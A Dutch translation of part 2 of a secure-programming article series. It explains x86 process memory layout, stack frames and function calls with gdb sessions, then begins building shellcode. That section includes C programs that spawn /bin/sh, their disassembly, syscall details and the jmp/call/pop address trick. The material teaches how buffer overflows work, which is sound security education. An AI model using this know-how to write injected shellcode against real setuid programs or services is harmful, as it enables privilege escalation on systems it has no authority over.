Het vermijden van veiligheidslekken bij het ontwikkelen van een applicatie - Deel 2: memory, stack en functies, shellcode

ArticleCategory:

Software Development

AuthorImage:

[de auteurs]

TranslationInfo:

Original in fr Frédéric Raynal, Christophe Blaess, Christophe Grenier

fr to en Georges Tarbouriech

en to nl Hendrik-Jan Heins

AboutTheAuthor:

Christophe Blaess is een onafhankelijke luchtvaart ingenieur. Hij is een Linux fan en werkt veel met dit systeem. Hij coördineert de vertaling van de man pages zoals die te vinden zijn op de site van het Linux Documentation Project.

Christophe Grenier is een 5e jaars student aan de ESIEA, hij werkt daar ook als systeembeheerder. Hij is gek van computer beveiligingssystemen.

Frédéric Raynal gebruikt Linux nu al jaren omdat het niet vervuilend is, niet opgepept wordt met hormonen, MSG of beendermeel... maar alleen met bloed, zweet, tranen en kennis.

Abstract

Deze serie artikelen is een poging om de belangrijkste veiligheidslekken die kunnen voorkomen in applicaties te benadrukken. Er worden methodes getoond om veiligheidslekken te vermijden door simpelweg je programmeergewoontes een beetje te veranderen.

Dit artikel is gefocussed op geheugenorganisatie, lay-out en de relatie tussen een functie en geheugen. De laatste sectie laat zien hoe shellcode gemaakt moet worden.

ArticleIllustration

article illustration

ArticleBody

Inleiding

In het vorige artikel hebben we de eenvoudigste veiligheidslekken geanalyseerd, degenen die gebaseerd zijn op externe commando-uitvoering. Dit artikel en het hierna volgende artikel, zullen een veel gebruikte aanval laten zien, de "buffer overflow". We zullen eerst de geheugenstructuur bestuderen van een draaiende applicatie, daarna zullen we een zeer klein stukje code schrijven dat het mogelijk maakt om een shell te starten (shellcode).

Geheugen layout

Wat is een programma?

Laten we er vanuit gaan dat een programma een serie instructies is, die is geschreven in machinetaal (het maakt hier niet uit in welke taal het programma is geschreven) dit noemen we over het algemeen een binary. Als de compilatie heeft plaatsgevonden, komen de variabelen, constanten en instructies uit de broncode beschikbaar. Dit deel geeft de geheugen layout van de verschillende delen van de "binary".

De verschillende gebieden

Om te begrijpen wat er gebeurt als een "binary" uitgevoerd wordt, gaan we kijken naar de geheugenorganisatie. Dit vertrouwt op verschillende gebieden:

memory layout

Dit is in feite niet alles, maar we kijken nu alleen naar de gebieden die van belang zijn voor dit artikel.

Het commando size -A bestand --radix 16 geeft het formaat van ieder gebied dat gereserveerd is tijdens het compileren. Hier krijg je de geheugenadressen vandaan (je kan ook het commando objdump gebruiken om deze informatie te verkrijgen). Hierbij is de output van size voor een binary die "fct" heet:

>>size -A fct --radix 16
fct :
section      size    addr
.interp      0x13  0x80480f4
.note.ABI-tag   0x20  0x8048108
.hash       0x30  0x8048128
.dynsym      0x70  0x8048158
.dynstr      0x7a  0x80481c8
.gnu.version    0xe  0x8048242
.gnu.version_r   0x20  0x8048250
.rel.got      0x8  0x8048270
.rel.plt      0x20  0x8048278
.init       0x2f  0x8048298
.plt        0x50  0x80482c8
.text       0x12c  0x8048320
.fini       0x1a  0x804844c
.rodata      0x14  0x8048468
.data        0xc  0x804947c
.eh_frame      0x4  0x8049488
.ctors       0x8  0x804948c
.dtors       0x8  0x8049494
.got        0x20  0x804949c
.dynamic      0xa0  0x80494bc
.bss        0x18  0x804955c
.stab       0x978     0x0
.stabstr     0x13f6     0x0
.comment     0x16e     0x0
.note       0x78  0x8049574
Total      0x23c8

Het tekst gebied bevat de programmainstructies. Dit gebied is alleen te lezen, niet te schrijven. Dit gebied wordt gedeeld tussen alle processen die in dezelfde binary draaien. Een poging om iets weg te schrijven in dit gebied, resulteert in een segmentation violation error.

Laten we, voordat we de andere gebieden gaan uitleggen, eerst een paar dingen over variabelen in C opnieuw noemen. De globale variabelen worden gebruikt in het gehele programma, terwijl de locale variabelen alleen worden gebruikt in de functie waarin ze aangeroepen worden. De statische variabelen hebben een al bekend formaat op basis van het type dat ze waren op het moment dat ze aangeroepen werden. Deze types kunnen zijn char, int, double, pointers, etc. Op een PC-type machine staat een pointer voor een 32 bits geheel getal binnen het geheugen. Het formaat van het gebied waarnaar verwezen wordt is dus onbekend gedurende de compilatie. Een dynamische variabele representeert een expliciet gealloceerd geheugengebied - het is in feite een pointer die wijst naar dat specifieke gealloceerde adres. Globale/locale, statische/dynamische variabelen kunnen zonder problemen worden gecombineerd.

Laten we teruggaan naar de geheugenorganisatie voor een gegeven proces. Het data gebied slaat de geïnitialiseerde globale statische gegevens op ( de waarde hiervoor wordt gegeven tijdens de compilatie), terwijl het bss segment de niet geïnitialiseerde gegevens opslaat. Deze gebieden zijn gereserveerd tijdens het compileren aangezien hun formaat wordt gedefinieerd aan de hand van de objecten die ze bevatten.

Hoe zit het met lokale en dynamische variabelen? Zij worden gegroepeerd in een geheugengebied dat gereserveerd is voor de programma uitvoering (user stack frame). Aangezien deze functies recursief kunnen worden aangeroepen, is het aantal aanroepen van een lokale variabele niet van tevoren bekend. Als je ze maakt, worden ze in de stack gezet. Deze stack ligt bovenop het hoogste adres binnen de gebruikers-adresruimte en werkt volgens een LIFO model (Last In, First Out). De onderkant van het gebruikers-frame gebied wordt gebruikt voor de allocatie van dynamische variabelen. Dit gebied wordt heap genoemd: het bevat de geheugengebieden die aangesproken worden door de pointers en de dynamische variabelen. Op het moment dat een pointer wordt uitgeroepen, is deze een 32bit variabele ofwel in BSS of in de stack en hij wijst niet naar een geldig adres. Wanneer een proces geheugen alloceert ( d.w.z. malloc gebruikt) wordt het adres van de eerste byte van dat geheugen (ook een 32 bit nummer) in de pointer gezet.

Gedetailleerd voorbeeld

Het volgende voorbeeld illustreert de layout van de variabelen in het geheugen:

/* mem.c */

 int  index = 1;  //in data
 char * str;     //in bss
 int  nothing;   //in bss

void f(char c)
{
 int i;       //in the stack
 /* Reserves 5 characters in the heap */
 str = (char*) malloc (5 * sizeof (char));
 strncpy(str, "abcde", 5);
}

int main (void)
{
 f(0);
}

De gdb debugger bevestigt dit alles.

>>gdb mem
GNU gdb 19991004
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public
License, and you are welcome to change it and/or distribute
copies of it under certain conditions. Type "show copying"
to see the conditions. There is absolutely no warranty
for GDB. Type "show warranty" for details. This GDB was
configured as "i386-redhat-linux"...
(gdb)

Laten we een breekpunt in de f() functie zetten en het programma tot dit punt draaien:

(gdb) list
7   void f(char c)
8   {
9     int i;
10    str = (char*) malloc (5 * sizeof (char));
11    strncpy (str, "abcde", 5);
12   }
13
14   int main (void)
(gdb) break 12
Breakpoint 1 at 0x804842a: file mem.c, line 12.
(gdb) run
Starting program: mem

Breakpoint 1, f (c=0 '\000') at mem.c:12
12   }

Nu kunnen we de plaats van de verschillende variabelen zien.

1. (gdb) print &index
$1 = (int *) 0x80494a4
2. (gdb) info symbol 0x80494a4
index in section .data
3. (gdb) print &nothing
$2 = (int *) 0x8049598
4. (gdb) info symbol 0x8049598
nothing in section .bss
5. (gdb) print str
$3 = 0x80495a8 "abcde"
6. (gdb) info symbol 0x80495a8
No symbol matches 0x80495a8.
7. (gdb) print &str
$4 = (char **) 0x804959c
8. (gdb) info symbol 0x804959c
str in section .bss
9. (gdb) x 0x804959c
0x804959c <str>:   0x080495a8
10. (gdb) x/2x 0x080495a8
0x80495a8: 0x64636261   0x00000065

Het commando in 1 (print &index) laat het geheugenadres voor de globale variabele index zien. De tweede instructie (info) geeft het symbool dat geassocieerd wordt met dit adres en de plaats in het geheugen waar dit gevonden kan worden weer: index, een geïnitialiseerde globale statische waarde wordt opgeslagen in het data gebied.

Instructies 3 en 4 bevesigen dat de ongeïnitialiseerde statische variabele niets gevonden kan worden in het BSS segment.

Regel 5 laat str zien... of eigenlijk de inhoud van de str variabele, en dat is het adres 0x80495a8. Instructie 6 laat zien dat geen enkele variabele op dit adres gedefiniëerd is. Commando 7 geeft je het adres van de str variabele en commando 8 geeft aan dat het gevonden kan worden in het BSS segment.

Op 9, corresponderen de 4 bytes die weergegeven worden met de geheugeninhoud op adres 0x804959c: dit is een gereserveerd adres binnen de "heap". De inhoud van 10 laat onze string "abcde"  zien:

hexadecimal value : 0x64 63 62 61   0x00000065
character     :  d c b a        e

De lokale variabelen c en i worden in de stack gestopt.

We kunnen zien dat het formaat dat het size commando geeft voor de verschillende gebieden niet overeenkomt met wat we verwachtten toen we naar ons programma keken. De reden hiervoor is dat de verschillende andere variabelen die aangegeven worden in bibliotheken verschijnen als het programma draait (type info variables onder gdb om ze allemaal te zien te krijgen).

De stack en de heap

Iedere keer dat een functie wordt aangeroepen, moet er een nieuwe omgeving worden aangemaakt binnen het geheugengebied voor lokale variabelen en de parameters van de functies (hier betekent omgeving alle elementen die verschijnen bij het uitvoeren van de functie: z'n argumenten, z'n lokale variabelen, z'n retouradres in de uitvoerings-stack.... dit is niet hetzelfde als de omgeving voor de shellvariabelen die we al hebben genoemd in het vorige artikel). Het %esp (extended stack pointer) register bevat het hoogste stackadres, dit staat onderaan in onze representatie, maar we zullen het de hoogste blijven noemen om onze analogie te complementeren naar een stack van echte objecten, daar deze wijst naar het laatste element dat aan de stack is toegevoegd; afhankelijk van de architectuur, kan dit register soms wijzen naar de eerste vrije ruimte in de stack.

Het adres van een lokale variabele binnen de stack kan worden uitgedrukt als een offset relatief aan %esp. Echter, items worden continu verwijderd van en toegevoegd aan de stack, de offset van iedere variabele zou dan iedere keer moeten worden bijgesteld en dat is zeer inefficiënt. Het gebruik van een tweede register kan hier een verbetering brengen: %ebp (uitgebreide basis pointer) bevat het startadres van de omgeving van de huidige functie. Daardoor is het voldoende om de offset gerelateerd aan dit register weer te geven. Deze blijft constant terwijl de functie wordt uitgevoerd. Hierdoor is het veel eenvoudiger om de parameters van de lokale variabelen binnen een functie te vinden.

De basiseenheid van de stack is het woord : op i386 CPUs is dit 32 bit, dat is 4 bytes. Dit is anders dan in andere architecturen. Op Alpha CPU's is een woord 64 bits. De stack beheert alleen woorden, dit betekent dat iedere geallokeerde variabele dezelfde woordgrootte bevat. We zullen dit gedetailleerder zien in de omschrijving van een functieproloog. De weergave van de inhoud van de str variabele wordt geïllustreerd door het gebruik van gdb in het voorgaande voorbeeld. Het gdb x commando laat het hele 32 bits woord zien (lees het van links naar rechts, omdat het een little endian representatie is).

De stack wordt normaal gesproken gemanipuleerd met behulp van slechts 2 cpu instructies :

De registers

Wat zijn registers precies? Je kan ze zien als laden die exact een woord bevatten, terwijl het geheugen een serie woorden bevat. Iedere keer dat er een nieuwe waarde in het register wordt geplaatst, gaat de oude waarde verloren. Registers staan een directe communicatie tussen geheugen en CPU toe.

De eerste 'e' die verschijnt in de registernaam betekent "extended" en geeft de evolutie tussen de oude 16 bit en huidige 32 bits architectuur aan.

De registers kunnen in 4 categorieën worden verdeeld:

 1. generale registers : %eax, %ebx, %ecx en %edx worden gebruikt om gegevens te manipuleren;
 2. segment registers : 16bit %cs, %ds, %esx en %ss, bevatten het eerste deel van een geheugenadres;
 3. offset registers : ze geven een offset gerelateerd aan een segment register aan:
 4. speciale registers : deze worden alleen door de CPU gebruikt.
Opmerking: alles dat hier verteld wordt over registers is zeer x86 geörienteerd, Alpha, Sparc etc. hebben registers met andere namen maar ongeveer gelijke functionaliteit.

De functies

Inleiding

Deze sectie laat het gedrag van een programma van begin tot eind zien. Door deze sectie heen zullen we het volgende voorbeeld gebruiken:
/* fct.c */

void toto(int i, int j)
{
 char str[5] = "abcde";
 int k = 3;
 j = 0;
 return;
}

int main(int argc, char **argv)
{
 int i = 1;
 toto(1, 2);
 i = 0;
 printf("i=%d\n",i);
}

Het doel van deze functie is het uitleggen van het gedrag van de bovenstaande functies met betrekking tot de stack en de registers. Sommige aanvallen proberen de manier waarop een programma draait te veranderen. Om ze te begrijpen is het nuttig om te weten wat er normaal gesproken gebeurt.

Het draaien van een functie is in drie delen verdeeld:

 1. De proloog: wanneer je een functie betreedt, maak je alvast de weg naar buiten klaar, bewaar je de staat van de stack voor het betreden van de functie en het maak je een reservering van het benodigde geheugen;
 2. De functie aanroep: wanneer een functie wordt aangeroepen, worden z'n parameters in de stack gezeten de instructiepointer (IP) wordt bewaard om de uitvoering van de instructie mogelijk te maken om door te gaan vanaf de juiste plaats na de functie;
 3. De functie return: om alles terug te zetten zoals ze waren voor het aanroepen van de functie.

De proloog

Een functie start altijd met de instructies:
push  %ebp
mov  %esp,%ebp
push  $0xc,%esp    //$0xc hangt af van ieder programma

Deze drie instructies zijn de bestandsdelen die de proloog maken. Diagram 1 detailleert hoe de toto() functie proloog werkt met uitleg van de %ebp en %esp register delen:

Diag. 1 : proloog van een function
prolog In eerste instantie wijst %ebp in het geheugen naar een willekeurig adres X. %esp is lager in de stack, op adres Y en wijst naar de laatste stack ingang. Wanneer je een functie betreedt, moet je het begin van de "huidige omgeving" bewaren, dat is %ebp. Aangezien %ebp in de stack wordt gezet, vermindert %esp met een geheugenwoord.
environment Deze tweede instructie staat de bouw van een nieuwe "omgeving" voor de functie toe , dit gebeurt door %ebp bovenop de stack te plaatsen. %ebp en %esp wijzen dan naar hetzelfde geheugenwoord dat het adres van de huidige omgeving bevat.
stack space for local variables Nu moet de stackruimte voor lokale variabelen worden gereserveerd. De karakter array wordt gedefinieerd met 5 items en deze heeft 5 bytes nodig (een karakter is een byte). De stack beheert echter alleen woorden, en kan alleen maar meervouden van een woord reserveren (1 woord, 2 woorden, 3 woorden, ...). Om 5 bytes op te slaan in het geval van een 4 bytes woord, moet je 8 bytes gebruiken (dat betekent dus 2 woorden). Het grijze gedeelte zou kunnen worden gebruikt, zelfs als het niet echt deel van de string is. Het gehele getal k maakt gebruik van 4 bytes. Deze ruimte wordt gereserveerd door de waarde van %esp met 0xc (12 in hexadecimalen) te verkleinen. De lokale variabelen gebruiken 8+4=12 bytes (dus: 3 woorden).

Behalve het mechanisme zelf, is het belangrijkste om te onthouden dat de variabele lokale positie hier is: de lokale variabelen heb ben een negatieve offset als ze gerelateerd zijn aan %ebp. De i=0 instructie in de main() functie illustreert dit. De "montagecode" (cf.below) gebruikt indirecte adressering om de i variabele te openen:

0x8048411 <main+25>:  movl  $0x0,0xfffffffc(%ebp)

De hexadecimaal 0xfffffffc representeert het gehele getal -4 De notatie betekent dat de waarde 0 in de variable e gevonden kan worden op "-4 bytes" relatief tot het %ebp register. i is de eerste en enige lokale variabele in de main() functie, daarom staat z'n adres 4 bytes (dus in gehele getallen ) "onder" het %ebp register.

De aanroep

Net zoals de proloog van een functie de omgeving voorbereid, staat de functie aanroep deze functie toe om z'n argumenten te ontvangen, en wanneer deze eindigt, te retourneren naar de aanroepfunctie.

Laten we als voorbeeld de toto(1, 2); aanroep nemen.

Diag. 2 : Functie aanroep
argument on stack Voordat je een functie aanroept, moeten de argumenten die die functie nodig heeft opgeslagen worden in de stack. In ons voorbeeld worden de twee constante gehele getallen 1 en 2 eerst in de stack gezet, te beginnen met de laatste. Het %eip register bevat het adres van de volgende instructie die uitgevoerd moet worden, in dit geval is dat de functieaanroep.
call

Als de aanroep instructie wordt uitgevoerd, neemt %eip de adreswaarde van de volgende instructie die 5 bytes erna (aanroep is een 5 byte instructie - niet iedere instructie gebruikt dezelfde ruimte, dat is afhankelijk van de CPU). De aanroep bewaart daarna het adres dat %eip bevat om de mogelijkheid te hebben om terug naar de uitvoering te gaan, ook na het draaien van de functie. Deze "backup" wordt gedaan vanaf een impliciete functie die het register in de stack plaatst:

  push %eip

De waarde die als argument gegeven wordt aan de aanroep komt overeen met het adres van de eerste prolooginstructie van de toto() functie. Dit adres wordt daarna naar %eip gekopieerd, en daarmee wordt dat de volgende uit te voeren instructie.

Zodra we in de "romp" van de functie zijn, hebben z'n argumenten en het retouradres een positieve offset wanneer ze gerelateerd zijn aan %ebp, aangezien de volgende instructie dit in dit register bovenop de stack plaatst. De j=0 instructie in de toto() functie illustreert dit. De assemblagecode gebruikt weer indirecte adressering om de j te openen:

0x80483ed <toto+29>:  movl  $0x0,0xc(%ebp)

De 0xc hexadecimaal representeert het gehele getal+12. De gebruikte notatie betekent dat de waarde 0 in de variabele kan worden gevonden op "+12 bytes" relatief aan het %ebp register. j is het tweede argument van de functie en het kan worden gevonden op 12 bytes "bovenop" het %ebp register (4 voor instructie-pointer backup, 4 voor het eerste argument en 4 voor het tweede argument - cf. het eerste diagram in de retour-sectie)

De retourwaarde

Het verlaten van een functie wordt in twee stappen uitgevoerd. Allereerst moet de omgeving die gemaakt is voor de functie worden opgeruimd (dus: %ebp en %eip worden teruggezet naar de waarde die ze voor de uitvoering van de functieaanroep hadden). Als dit gebeurd is, moeten we de stack controleren om informatie te verkrijgen over de functie waar we net uit gekomen zijn.

De eerste stap wordt binnen de functie gedaan met de volgende instructies:

leave
ret

De volgende wordt uitgevoerd binnen de functie van waaruit de aanroep plaatsvond en bestaat uit het opruimen van de argumenten van de aangeroepen functie uit de stack.

We gaan door met het voorgaande voorbeeld van de toto() functie.

Diag. 3 : Functie retour
initial situation Hier omschrijven we de initiële situatie voor de aanroep en de proloog. Voor de aanroep was %ebp op adres X en %esp op adres Y. VAnaf hier hebben we de functieargumenten gestacked, %eip en %ebp bewaard en wat ruimte gereserveerd voor onze lokale variabelen. De volgende uit te voeren instructie zal leave zijn.
leave De instructie leave is equivalent aan de sequentie:
  mov ebp esp
  pop ebp

De eerste neemt %esp en %ebp terug naar dezelfde plaats in de stack. De tweede plaatst de top van de stack in het %ebp register. Alleen in de instructie (leave) ziet de stack eruit alsof er nooit een proloog is geweest.
restore De ret instructie zet %eip zodanig terug dat de aanroepende functieuitvoer daar begint waar dat zou moeten, dus na de functie waar we uitgekomen zijn. Voor deze functie is het voldoende om de top van de stack te "on-stacken" in %eip.

We zijn nog niet terug bij de initiële situatie aangezien de functieargumenten nog steeds gestacked zijn. Deze verwijderen is de volgende instructie, dit wordt gerepresenteerd door het Z+5 adres in %eip (let erop dat de instructie-adressering oploopt, terwijl de stack-adressering aflopend is).

stacking of parameters De stack van parameters wordt uitgevoerd in de aanroepfunctie, en dit gebeurt ook bij het "unstacken". Dit wordt geïllustreerd in het naaststaande diagram met de scheiding tussen de instructies in de aangeroepen functie en add 0x8, %esp in de aanroepende functie. Deze instructie neemt %esp terug naar de top van de stack, voor zowel bytes als de functieparameters toto() gebruikten. De %ebp en %esp registers staan nu in de situatie waarin ze ook stonden voor de aanroep. Echter, het %eip instructieregister is naar boven verplaatst.

Ontmantelen (Disassembling)

gdb staat de assembler code to om de corresponderende main() en toto() functies te krijgen:

>>gcc -g -o fct fct.c
>>gdb fct
GNU gdb 19991004
Copyright 1998 Free Software Foundation, Inc. GDB is free
software, covered by the GNU General Public License, and
you are welcome to change it and/or distribute copies of
it under certain conditions. Type "show copying" to see
the conditions. There is absolutely no warranty for GDB.
Type "show warranty" for details. This GDB was configured
as "i386-redhat-linux"...
(gdb) disassemble main          //main
Dump of assembler code for function main:

0x80483f8 <main>:  push  %ebp //prolog
0x80483f9 <main+1>: mov  %esp,%ebp
0x80483fb <main+3>: sub  $0x4,%esp

0x80483fe <main+6>: movl  $0x1,0xfffffffc(%ebp)

0x8048405 <main+13>: push  $0x2 //call
0x8048407 <main+15>: push  $0x1
0x8048409 <main+17>: call  0x80483d0 <toto>


0x804840e <main+22>: add  $0x8,%esp //return from toto()

0x8048411 <main+25>: movl  $0x0,0xfffffffc(%ebp)
0x8048418 <main+32>: mov  0xfffffffc(%ebp),%eax

0x804841b <main+35>: push  %eax   //call
0x804841c <main+36>: push  $0x8048486
0x8048421 <main+41>: call  0x8048308 <printf>


0x8048426 <main+46>: add  $0x8,%esp //return from printf()
0x8048429 <main+49>: leave      //return from main()
0x804842a <main+50>: ret

End of assembler dump.
(gdb) disassemble toto          //toto
Dump of assembler code for function toto:

0x80483d0 <toto>:   push  %ebp  //prolog
0x80483d1 <toto+1>:  mov  %esp,%ebp
0x80483d3 <toto+3>:  sub  $0xc,%esp

0x80483d6 <toto+6>:  mov  0x8048480,%eax
0x80483db <toto+11>: mov  %eax,0xfffffff8(%ebp)
0x80483de <toto+14>: mov  0x8048484,%al
0x80483e3 <toto+19>: mov  %al,0xfffffffc(%ebp)
0x80483e6 <toto+22>: movl  $0x3,0xfffffff4(%ebp)
0x80483ed <toto+29>: movl  $0x0,0xc(%ebp)
0x80483f4 <toto+36>: jmp  0x80483f6 <toto+38>

0x80483f6 <toto+38>: leave     //return from toto()
0x80483f7 <toto+39>: ret

End of assembler dump.
De instructies zonder kleur corresponderen met onze programma-instructies, zoals bijvoorbeeld toewijzing.

Het maken van shellcode

In sommige gevallen is het mogelijk om te reageren op de proces stack inhoud door het retouradres van een functie te overschrijven en de applicatie een of andere code uit te laten voeren. Dit is vooral interessant voor een cracker als de applicatie onder een ander ID draait dan dat van de gebruiker (Set-UID programma of daemon). Dit type fout is vooral gevaarlijk als een programma zoals bijvoorbeeld een documentleesprogramma wordt gestart door een andere gebruiker. De beroemde Acrobat Reader bug is hiervan een voorbeeld, hierbij kon een gemodificeerd document een buffer overflow starten. Dit werkt ook voor netwerkservices (zoals bijvoorbeeld imap).

In toekomstige artikelen zullen we het gaan hebben over mechanismen die gebruikt worden om instructies uit te voeren. Hier beginnen we met het bestuderen van de code zelf, degene die we uitgevoerd willen hebben van de hoofdapplicatie. De eenvoudigste oplossing is het de beschikking hebben over een deel van de code om op een shell te draaien. Het leesprogramma kan daarna bepaalde acties uitvoeren zoals bijvoorbeeld het veranderen van de toegangsrechten van het /etc/passwd bestand. Om redenen die later duidelijk zullen worden, moet dit programma gemaakt worden in assembler. Dit type kleine programma's draaien meestal een shell en wordt meestal shellcode genoemd.

De voorbeelden die hier genoemd worden, zijn geschreven aan de hand van Aleph One's artikel "Smashing the Stack for Fun and Profit" uit Phrack magazine number 49.

Met de taal C

Het doel van shellcode is draaien in een shell. Het nu volgende C programma doet dat:

/* shellcode1.c */

  #include <stdio.h>
  #include <unistd.h>

int main()
{
 char * name[] = {"/bin/sh", NULL};
 execve(name[0], name, NULL);
 return (0);
}

Tussen de functiesets die een shell kunnen aanroepen, is het gebruik van execve() om meerdere redenen aan te raden. Allereerst is dit een echte systeemaanroep, in tegenstelling tot andere functies uit de exec() familie, die in feite bestaat uit GlibC bibliotheekfuncties opgebouwd uit onder andere execve(). Een systeem aanroep wordt vanaf een interrupt gedaan. Het is voldoende om de registers en hun inhoud te definiëren om een effectieve en korte assemblagecode te krijgen.

Als execve() slaagt, wordt de aanroepende programma (hier de hoofdapplicatie) vervangen door de uitvoerbare code van het nieuwe programma en start hij. Als de execve() aanroep faalt, gaat de programma uitvoer door. In ons voorbeeld, wordt de code ingevoegd in het midden van de aangevallen applicatie. Doorgaan met de uitvoering zou nutteloos zijn en kan zelfs desastreuze gevolgen hebben. De uitvoering moet dan zo snel mogelijk eindigen. Een return (0) staat het beëindigen van een programma alleen maar toe wanneer deze instructie wordt aangeroepen van de main() functie, dit is hier onwaarschijnlijk. We moeten dan een terminatie forceren met behulp van de exit() functie.

/* shellcode2.c */

  #include <stdio.h>
  #include <unistd.h>

int main()
{
 char * name [] = {"/bin/sh", NULL};
 execve (name [0], name, NULL);
 exit (0);
}

In feite is exit() een andere bibliotheekfunctie die de echte systeem aanroep _exit() omvat. Een nieuwe verandering brengt ons dichter bij het systeem:

/* shellcode3.c */
  #include <unistd.h>
  #include <stdio.h>

int main()
{
 char * name [] = {"/bin/sh", NULL};
 execve (name [0], name, NULL);
 _exit(0);
}
Nu is het tijd om ons programma te vergelijken met z'n assemblage equivalent.

Assemblage aanroepen

We zullen gcc en gdb gebruiken om de assemblage instructies die corresponderen met ons programmaatje te krijgen. Laten we nu shellcode3.c compileren met de debug optie (-g) en de functies die normaal gesproken in de gedeelde bibliotheken gevonden worden, integreren met de optie --static option. Nu hebben we de benodigde informatie om te begrijpen hoe de _exexve() en _exit() systeem aanroepen werken.
$ gcc -o shellcode3 shellcode3.c -O2 -g --static
Hierna kijken we, met behulp van gdb, naar onze functie assemblage equivalent. Deze is voor Linux op het Intel platform (i386 en hoger).
$ gdb shellcode3
GNU gdb 4.18
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public
License, and you are welcome to change it and/or distribute
copies of it under certain conditions. Type "show copying"
to see the conditions. There is absolutely no warranty
for GDB. Type "show warranty" for details. This GDB was
configured as "i386-redhat-linux"...
We vragen gdb om de assemblagecode weer te geven, meer in het bijzonder z'n main() functie.
(gdb) disassemble main
Dump of assembler code for function main:
0x8048168 <main>:    push  %ebp
0x8048169 <main+1>:   mov  %esp,%ebp
0x804816b <main+3>:   sub  $0x8,%esp
0x804816e <main+6>:   movl  $0x0,0xfffffff8(%ebp)
0x8048175 <main+13>:  movl  $0x0,0xfffffffc(%ebp)
0x804817c <main+20>:  mov  $0x8071ea8,%edx
0x8048181 <main+25>:  mov  %edx,0xfffffff8(%ebp)
0x8048184 <main+28>:  push  $0x0
0x8048186 <main+30>:  lea  0xfffffff8(%ebp),%eax
0x8048189 <main+33>:  push  %eax
0x804818a <main+34>:  push  %edx
0x804818b <main+35>:  call  0x804d9ac <__execve>
0x8048190 <main+40>:  push  $0x0
0x8048192 <main+42>:  call  0x804d990 <_exit>
0x8048197 <main+47>:  nop
End of assembler dump.
(gdb)
De aanroepen van de functies op de adressen 0x804818b en 0x8048192 roepen de C bibliotheek subroutines die de echte systeemaanroepen bevatten aan. Merk hierbij op dat de 0x804817c : mov $0x8071ea8,%edx instructie het %edx register vult met een waarde die op een adres lijkt. Laten we de geheugeninhoud van dit adres onderzoeken, met behulp van een stringweergave:
(gdb) printf "%s\n", 0x8071ea8
/bin/sh
(gdb)
Nu weten we waar de string is. Laten we eens kijken naar de ontleed functie lijst execve() en _exit():
(gdb) disassemble __execve
Dump of assembler code for function __execve:
0x804d9ac <__execve>:  push  %ebp
0x804d9ad <__execve+1>: mov  %esp,%ebp
0x804d9af <__execve+3>: push  %edi
0x804d9b0 <__execve+4>: push  %ebx
0x804d9b1 <__execve+5>: mov  0x8(%ebp),%edi
0x804d9b4 <__execve+8>: mov  $0x0,%eax
0x804d9b9 <__execve+13>: test  %eax,%eax
0x804d9bb <__execve+15>: je   0x804d9c2 <__execve+22>
0x804d9bd <__execve+17>: call  0x0
0x804d9c2 <__execve+22>: mov  0xc(%ebp),%ecx
0x804d9c5 <__execve+25>: mov  0x10(%ebp),%edx
0x804d9c8 <__execve+28>: push  %ebx
0x804d9c9 <__execve+29>: mov  %edi,%ebx
0x804d9cb <__execve+31>: mov  $0xb,%eax
0x804d9d0 <__execve+36>: int  $0x80
0x804d9d2 <__execve+38>: pop  %ebx
0x804d9d3 <__execve+39>: mov  %eax,%ebx
0x804d9d5 <__execve+41>: cmp  $0xfffff000,%ebx
0x804d9db <__execve+47>: jbe  0x804d9eb <__execve+63>
0x804d9dd <__execve+49>: call  0x8048c84 <__errno_location>
0x804d9e2 <__execve+54>: neg  %ebx
0x804d9e4 <__execve+56>: mov  %ebx,(%eax)
0x804d9e6 <__execve+58>: mov  $0xffffffff,%ebx
0x804d9eb <__execve+63>: mov  %ebx,%eax
0x804d9ed <__execve+65>: lea  0xfffffff8(%ebp),%esp
0x804d9f0 <__execve+68>: pop  %ebx
0x804d9f1 <__execve+69>: pop  %edi
0x804d9f2 <__execve+70>: leave
0x804d9f3 <__execve+71>: ret
End of assembler dump.
(gdb) disassemble _exit
Dump of assembler code for function _exit:
0x804d990 <_exit>:   mov  %ebx,%edx
0x804d992 <_exit+2>:  mov  0x4(%esp,1),%ebx
0x804d996 <_exit+6>:  mov  $0x1,%eax
0x804d99b <_exit+11>:  int  $0x80
0x804d99d <_exit+13>:  mov  %edx,%ebx
0x804d99f <_exit+15>:  cmp  $0xfffff001,%eax
0x804d9a4 <_exit+20>:  jae  0x804dd90 <__syscall_error>
End of assembler dump.
(gdb) quit
De echte kernelaanroep wordt gedaan door de interrupt 0x80 op adres 0x804d9d0 voor execve() en op 0x804d99b voor _exit(). Dit startpunt komt overeen met verschillende systeemaanroepen, dus wordt het onderscheid gemaakt met de registerinhoud %eax. Wat betreft execve(), heeft dit de waarde 0x0B, terwijl _exit() de waarde 0x01 heeft.

Diag. 4 : parameters van de execve() functie
parameters of the execve() function

De analyse van de assembly-instructies van deze functies geeft ons de parameters die ze gebruiken:

Nu hebben we de "/bin/sh" string nodig, een pointer naar deze string en een NULL pointer ( voor de argumenten, aangezien we er geen hebben en voor de omgeving sinds we er ook daarvan geen hebben gedefinieerd). We kunnen een mogelijke gegevens representatie zien voor de execve() aanroep. Het bouwen van een array met een pointer naar de /bin/sh string gevolgd door een NULL pointer, met %ebx dat naar de string zal wijzen, %ecx dat naar de hele array verwijst en %edx dat verwijst naar het tweede item van de array(NULL). Dit alles is te zien in het diagram. 5.

Diag. 5 : gegevens representatie relatief aan de registers
data

Het vinden van de shellcode in het geheugen

De shellcode wordt normaal gesproken ingevoegd in een kwetsbaaar programma met behulp van een shell argument, een omgevingsvariabele of een getypte string. Hoe dan ook, wanneer je shellcode maakt, weet je niet welk adres deze zal gebruiken. Desalniettemin moeten we het "/bin/sh" string adres kennen. Een trucje zorgt er voor dat we dit kunnen krijgen.

Wanneer een subroutine wordt aangeroepen met de instructie call, bewaart de CPU het retouradres in de stack, dat is het adres dat direct op deze call instructie volgt (zie hierboven). Normaal gesproken is de volgende stap het bewaren van de gegevens stack staat (vooral het %ebp register met de push %ebp instructie). Om het retouradres te krijgen wanneer je de subroutine start, is het voldoende om te "on-stacken" met de instructie pop. Hierna bewaren we natuurlijk onze "/bin/sh" string meteen na de call instructie om onze "doe het zelf proloog" toe te staan ons te voorzien van het benodigde string adres. Dat is:

 beginning_of_shellcode:
  jmp subroutine_call

 subroutine:
  popl %esi
  ...
  (Shellcode itself)
  ...
 subroutine_call:
  call subroutine
  /bin/sh

